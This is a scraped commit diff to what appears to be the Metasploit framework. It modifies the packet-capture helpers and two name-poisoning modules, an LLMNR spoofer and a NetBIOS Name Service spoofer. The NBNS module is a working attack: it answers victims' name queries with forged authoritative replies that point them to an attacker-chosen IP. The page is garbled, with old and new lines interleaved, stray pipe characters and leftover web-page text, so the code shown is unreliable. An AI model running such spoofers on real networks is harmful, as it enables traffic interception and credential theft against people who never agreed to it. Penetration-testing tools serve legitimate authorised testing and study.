commit
bd4738b93e
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@ -42,7 +42,7 @@ module Msf
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[
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true,
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'Send a TTL=1 random UDP datagram to this host to discover the default gateway\'s MAC',
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'www.metasploit.com']),
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'8.8.8.8']),
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OptPort.new('GATEWAY_PROBE_PORT',
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[
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false,
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@ -143,7 +143,6 @@ module Msf
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return unless self.capture
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self.capture = nil
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self.arp_capture = nil
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GC.start()
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end
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def capture_extract_ies(raw)
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@ -163,26 +162,15 @@ module Msf
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end
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#
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# This monstrosity works around a series of bugs in the interrupt
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# signal handling of Ruby 1.9
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# Loop through each packet
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#
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def each_packet
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return unless capture
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begin
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@capture_count = 0
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reader = framework.threads.spawn("PcapReceiver", false) do
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capture.each do |pkt|
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yield(pkt)
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@capture_count += 1
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end
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end
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reader.join
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rescue ::Exception
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raise $!
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ensure
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reader.kill if reader.alive?
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@capture_count ||= 0
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capture.each do |pkt|
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yield(pkt)
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@capture_count += 1
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end
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@capture_count
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end
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@ -242,10 +230,9 @@ module Msf
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pcap.inject(pkt)
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Rex.sleep((delay * 1.0)/1000)
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end
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GC.start
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end
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# Capture_sendto is intended to replace the old Rex::Socket::Ip.sendto method. It requires
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# capture_sendto is intended to replace the old Rex::Socket::Ip.sendto method. It requires
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# a payload and a destination address. To send to the broadcast address, set bcast
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# to true (this will guarantee that packets will be sent even if ARP doesn't work
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# out).
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@ -262,24 +249,20 @@ module Msf
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# The return value either be a PacketFu::Packet object, or nil
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def inject_reply(proto=:udp, pcap=self.capture)
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reply = nil
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to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
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if not pcap
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raise RuntimeError, "Could not access the capture process (remember to open_pcap first!)"
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else
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begin
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::Timeout.timeout(to) do
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pcap.each do |r|
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packet = PacketFu::Packet.parse(r)
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next unless packet.proto.map { |x| x.downcase.to_sym }.include? proto
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reply = packet
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break
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end
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# Defaults to ~2 seconds
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to = (datastore['TIMEOUT'] * 4) / 1000.0
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raise RuntimeError, "Could not access the capture process (remember to open_pcap first!)" if not pcap
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begin
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::Timeout.timeout(to) do
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pcap.each do |r|
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packet = PacketFu::Packet.parse(r)
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next unless packet.proto.map { |x| x.downcase.to_sym }.include? proto
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return packet
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end
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rescue ::Timeout::Error
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end
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rescue ::Timeout::Error
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end
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return reply
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nil
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end
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# This ascertains the correct Ethernet addresses one should use to
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@ -328,20 +311,19 @@ module Msf
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end
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begin
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to = (datastore['TIMEOUT'] || 1500).to_f / 1000.0
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to = ((datastore['TIMEOUT'] || 500).to_f * 8) / 1000.0
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::Timeout.timeout(to) do
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while (my_packet = inject_reply(:udp, self.arp_capture))
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if my_packet.payload == secret
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dst_mac = self.arp_cache[:gateway] = my_packet.eth_daddr
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src_mac = self.arp_cache[Rex::Socket.source_address(addr)] = my_packet.eth_saddr
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return [dst_mac, src_mac]
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else
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next
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end
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loop do
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my_packet = inject_reply(:udp, self.arp_capture)
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next unless my_packet
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next unless my_packet.payload == secret
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dst_mac = self.arp_cache[:gateway] = my_packet.eth_daddr
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src_mac = self.arp_cache[Rex::Socket.source_address(addr)] = my_packet.eth_saddr
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return [dst_mac, src_mac]
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end
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end
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rescue ::Timeout::Error
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# Well, that didn't work (this common on networks where there's no gatway, like
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# Well, that didn't work (this is common on networks where there's no gateway, like
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# VMWare network interfaces. We'll need to use a fake source hardware address.
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self.arp_cache[Rex::Socket.source_address(addr)] = "00:00:00:00:00:00"
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end
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@ -354,26 +336,31 @@ module Msf
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return self.arp_cache[:gateway] unless should_arp? target_ip
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source_ip = Rex::Socket.source_address(target_ip)
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raise RuntimeError, "Could not access the capture process." unless self.arp_capture
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p = arp_packet(target_ip, source_ip)
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inject_eth(:eth_type => 0x0806,
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:payload => p,
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:pcap => self.arp_capture,
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:eth_saddr => self.arp_cache[Rex::Socket.source_address(target_ip)]
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)
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begin
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to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
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::Timeout.timeout(to) do
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while (my_packet = inject_reply(:arp, self.arp_capture))
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if my_packet.arp_saddr_ip == target_ip
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# Try up to 3 times to get an ARP response
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1.upto(3) do
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inject_eth(:eth_type => 0x0806,
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:payload => p,
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:pcap => self.arp_capture,
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:eth_saddr => self.arp_cache[Rex::Socket.source_address(target_ip)]
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)
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begin
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to = ((datastore['TIMEOUT'] || 500).to_f * 8) / 1000.0
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::Timeout.timeout(to) do
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loop do
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my_packet = inject_reply(:arp, self.arp_capture)
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next unless my_packet
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next unless my_packet.arp_saddr_ip == target_ip
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self.arp_cache[target_ip] = my_packet.eth_saddr
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return self.arp_cache[target_ip]
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else
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next
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end
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end
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rescue ::Timeout::Error
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end
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rescue ::Timeout::Error
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end
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nil
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end
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# Creates a full ARP packet, mainly for use with inject_eth()
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@ -76,7 +76,6 @@ module Exploit::Remote::Ipv6
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return if not @ipv6_icmp6_capture
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@ipv6_icmp6_capture = nil
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GC.start()
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end
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#
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@ -103,7 +103,6 @@ class Metasploit3 < Msf::Auxiliary
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if datastore['LISTENER']
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@listener.kill if @listener
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GC.start()
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end
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if capture and @spoofing and not datastore['BROADCAST']
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@ -139,9 +139,7 @@ attr_accessor :sock, :thread
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end
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ip_pkt.recalc
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open_pcap
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capture_sendto(ip_pkt, rhost.to_s, true)
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close_pcap
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capture_sendto(ip_pkt, rhost.to_s, true)
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end
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def monitor_socket
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@ -176,7 +174,10 @@ attr_accessor :sock, :thread
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def run
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check_pcaprub_loaded()
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::Socket.do_not_reverse_lookup = true
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::Socket.do_not_reverse_lookup = true # Mac OS X workaround
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# Avoid receiving extraneous traffic on our send socket
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open_pcap({'FILTER' => 'ether host f0:f0:f0:f0:f0:f0'})
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# Multicast Address for LLMNR
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multicast_addr = ::IPAddr.new("224.0.0.252")
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@ -191,24 +192,28 @@ attr_accessor :sock, :thread
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self.sock = Rex::Socket.create_udp(
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# This must be INADDR_ANY to receive multicast packets
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'LocalHost' => "0.0.0.0",
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'LocalPort' => 5355)
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'LocalPort' => 5355,
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'Context' => { 'Msf' => framework, 'MsfExploit' => self }
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)
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self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
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self.sock.setsockopt(::Socket::IPPROTO_IP, ::Socket::IP_ADD_MEMBERSHIP, optval)
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self.thread = Rex::ThreadFactory.spawn("LLMNRServerMonitor", false) {
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monitor_socket
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monitor_socket
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}
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print_status("LLMNR Spoofer started. Listening for LLMNR requests with REGEX \"#{datastore['REGEX']}\" ...")
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add_socket(self.sock)
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while thread.alive?
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select(nil, nil, nil, 0.25)
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end
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self.thread.kill
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self.sock.close rescue nil
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self.thread.join
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end
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def cleanup
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if self.thread and self.thread.alive?
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self.thread.kill
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self.thread = nil
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end
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close_pcap
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end
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end
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@ -9,6 +9,9 @@ class Metasploit3 < Msf::Auxiliary
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include Msf::Exploit::Capture
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attr_accessor :sock, :thread
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def initialize
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super(
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'Name' => 'NetBIOS Name Service Spoofer',
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@ -44,108 +47,142 @@ class Metasploit3 < Msf::Auxiliary
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])
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register_advanced_options([
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OptBool.new('Debug', [ false, "Determines whether incoming packet parsing is displayed", false])
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OptBool.new('DEBUG', [ false, "Determines whether incoming packet parsing is displayed", false])
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])
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deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER')
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self.thread = nil
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self.sock = nil
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end
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def dispatch_request(packet, rhost, src_port)
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rhost = ::IPAddr.new(rhost)
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# `recvfrom` (on Linux at least) will give us an ipv6/ipv4 mapped
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# addr like "::ffff:192.168.0.1" when the interface we're listening
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# on has an IPv6 address. Convert it to just the v4 addr
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if rhost.ipv4_mapped?
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rhost = rhost.native
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end
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# Convert to string
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rhost = rhost.to_s
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spoof = ::IPAddr.new(datastore['SPOOFIP'])
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return if packet.length == 0
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nbnsq_transid = packet[0..1]
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nbnsq_flags = packet[2..3]
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nbnsq_questions = packet[4..5]
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nbnsq_answerrr = packet[6..7]
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nbnsq_authorityrr = packet[8..9]
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nbnsq_additionalrr = packet[10..11]
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nbnsq_name = packet[12..45]
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decoded = ""
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nbnsq_name.slice(1..-2).each_byte do |c|
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decoded << "#{(c - 65).to_s(16)}"
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end
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nbnsq_decodedname = "#{[decoded].pack('H*')}".strip()
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nbnsq_type = packet[46..47]
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nbnsq_class = packet[48..49]
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return unless nbnsq_decodedname =~ /#{datastore['REGEX']}/i
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vprint_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{spoof}")
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if datastore['DEBUG']
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print_status("transid: #{nbnsq_transid.unpack('H4')}")
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print_status("tlags: #{nbnsq_flags.unpack('B16')}")
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print_status("questions: #{nbnsq_questions.unpack('n')}")
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print_status("answerrr: #{nbnsq_answerrr.unpack('n')}")
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print_status("authorityrr: #{nbnsq_authorityrr.unpack('n')}")
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print_status("additionalrr: #{nbnsq_additionalrr.unpack('n')}")
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print_status("name: #{nbnsq_name} #{nbnsq_name.unpack('H34')}")
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print_status("full name: #{nbnsq_name.slice(1..-2)}")
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print_status("decoded: #{decoded}")
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print_status("decoded name: #{nbnsq_decodedname}")
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print_status("type: #{nbnsq_type.unpack('n')}")
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print_status("class: #{nbnsq_class.unpack('n')}")
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end
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# time to build a response packet - Oh YEAH!
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response = nbnsq_transid +
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"\x85\x00" + # Flags = response + authoratative + recursion desired +
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"\x00\x00" + # Questions = 0
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"\x00\x01" + # Answer RRs = 1
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"\x00\x00" + # Authority RRs = 0
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"\x00\x00" + # Additional RRs = 0
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nbnsq_name + # original query name
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nbnsq_type + # Type = NB ...whatever that means
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nbnsq_class+ # Class = IN
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"\x00\x04\x93\xe0" + # TTL = a long ass time
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"\x00\x06" + # Datalength = 6
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"\x00\x00" + # Flags B-node, unique = whatever that means
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spoof.hton
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pkt = PacketFu::UDPPacket.new
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pkt.ip_saddr = Rex::Socket.source_address(rhost)
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pkt.ip_daddr = rhost
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pkt.ip_ttl = 255
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pkt.udp_sport = 137
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pkt.udp_dport = src_port
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pkt.payload = response
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pkt.recalc
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capture_sendto(pkt, rhost)
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end
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def monitor_socket
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while true
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rds = [self.sock]
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wds = []
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eds = [self.sock]
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r,_,_ = ::IO.select(rds,wds,eds,0.25)
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if (r != nil and r[0] == self.sock)
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packet, host, port = self.sock.recvfrom(65535)
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dispatch_request(packet, host, port)
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end
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end
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end
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def run
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check_pcaprub_loaded() # Check first since otherwise this is all for naught
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# MacOS X workaround
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::Socket.do_not_reverse_lookup = true
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check_pcaprub_loaded()
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::Socket.do_not_reverse_lookup = true # Mac OS X workaround
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@sock = ::UDPSocket.new()
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@sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
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@sock.bind('', 137) # couldn't specify srv host because it missed broadcasts
|
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# Avoid receiving extraneous traffic on our send socket
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open_pcap({'FILTER' => 'ether host f0:f0:f0:f0:f0:f0'})
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|
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@run = true
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self.sock = Rex::Socket.create_udp(
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'LocalHost' => "0.0.0.0",
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'LocalPort' => 137,
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'Context' => { 'Msf' => framework, 'MsfExploit' => self }
|
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)
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add_socket(self.sock)
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self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
|
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|
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print_status("NBNS Spoofer started. Listening for NBNS requests...")
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|
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begin
|
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|
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while @run # Not exactly thrilled we can never turn this off XXX fix this sometime.
|
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packet, addr = @sock.recvfrom(512)
|
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src_port = addr[1]
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rhost = addr[3]
|
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|
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break if packet.length == 0
|
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|
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nbnsq_transid = packet[0..1]
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nbnsq_flags = packet[2..3]
|
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nbnsq_questions = packet[4..5]
|
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nbnsq_answerrr = packet[6..7]
|
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nbnsq_authorityrr = packet[8..9]
|
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nbnsq_additionalrr = packet[10..11]
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nbnsq_name = packet[12..45]
|
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decoded = ""
|
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nbnsq_name.slice(1..-2).each_byte do |c|
|
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decoded << "#{(c - 65).to_s(16)}"
|
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self.thread = Rex::ThreadFactory.spawn("NBNSServerMonitor", false) {
|
||||
begin
|
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monitor_socket
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception
|
||||
print_error("Error: #{$!.class} #{$!} #{$!.backtrace}")
|
||||
end
|
||||
nbnsq_decodedname = "#{[decoded].pack('H*')}".strip()
|
||||
nbnsq_type = packet[46..47]
|
||||
nbnsq_class = packet[48..49]
|
||||
}
|
||||
|
||||
if (nbnsq_decodedname =~ /#{datastore['REGEX']}/i)
|
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print_status("NBNS Spoofer started. Listening for NBNS requests with REGEX \"#{datastore['REGEX']}\" ...")
|
||||
|
||||
vprint_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{datastore["SPOOFIP"]}")
|
||||
|
||||
if datastore['DEBUG']
|
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print_status("transid: #{nbnsq_transid.unpack('H4')}")
|
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print_status("tlags: #{nbnsq_flags.unpack('B16')}")
|
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print_status("questions: #{nbnsq_questions.unpack('n')}")
|
||||
print_status("answerrr: #{nbnsq_answerrr.unpack('n')}")
|
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print_status("authorityrr: #{nbnsq_authorityrr.unpack('n')}")
|
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print_status("additionalrr: #{nbnsq_additionalrr.unpack('n')}")
|
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print_status("name: #{nbnsq_name} #{nbnsq_name.unpack('H34')}")
|
||||
print_status("full name: #{nbnsq_name.slice(1..-2)}")
|
||||
print_status("decoded: #{decoded}")
|
||||
print_status("decoded name: #{nbnsq_decodedname}")
|
||||
print_status("type: #{nbnsq_type.unpack('n')}")
|
||||
print_status("class: #{nbnsq_class.unpack('n')}")
|
||||
end
|
||||
|
||||
# time to build a response packet - Oh YEAH!
|
||||
response = nbnsq_transid +
|
||||
"\x85\x00" + # Flags = response + authoratative + recursion desired +
|
||||
"\x00\x00" + # Questions = 0
|
||||
"\x00\x01" + # Answer RRs = 1
|
||||
"\x00\x00" + # Authority RRs = 0
|
||||
"\x00\x00" + # Additional RRs = 0
|
||||
nbnsq_name + # original query name
|
||||
nbnsq_type + # Type = NB ...whatever that means
|
||||
nbnsq_class+ # Class = IN
|
||||
"\x00\x04\x93\xe0" + # TTL = a long ass time
|
||||
"\x00\x06" + # Datalength = 6
|
||||
"\x00\x00" + # Flags B-node, unique = whet ever that means
|
||||
datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*')
|
||||
|
||||
open_pcap
|
||||
|
||||
p = PacketFu::UDPPacket.new
|
||||
p.ip_saddr = Rex::Socket.source_address(rhost)
|
||||
p.ip_daddr = rhost
|
||||
p.ip_ttl = 255
|
||||
p.udp_sport = 137
|
||||
p.udp_dport = src_port
|
||||
p.payload = response
|
||||
p.recalc
|
||||
|
||||
capture_sendto(p, rhost)
|
||||
|
||||
close_pcap
|
||||
|
||||
else
|
||||
vprint_status("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} did not match regex")
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Exception => e
|
||||
print_error("nbnspoof: #{e.class} #{e} #{e.backtrace}")
|
||||
# Make sure the socket gets closed on exit
|
||||
ensure
|
||||
@sock.close
|
||||
end
|
||||
self.thread.join
|
||||
print_status("NBNS Monitor thread exited...")
|
||||
end
|
||||
|
||||
def cleanup
|
||||
if self.thread and self.thread.alive?
|
||||
self.thread.kill
|
||||
self.thread = nil
|
||||
end
|
||||
close_pcap
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue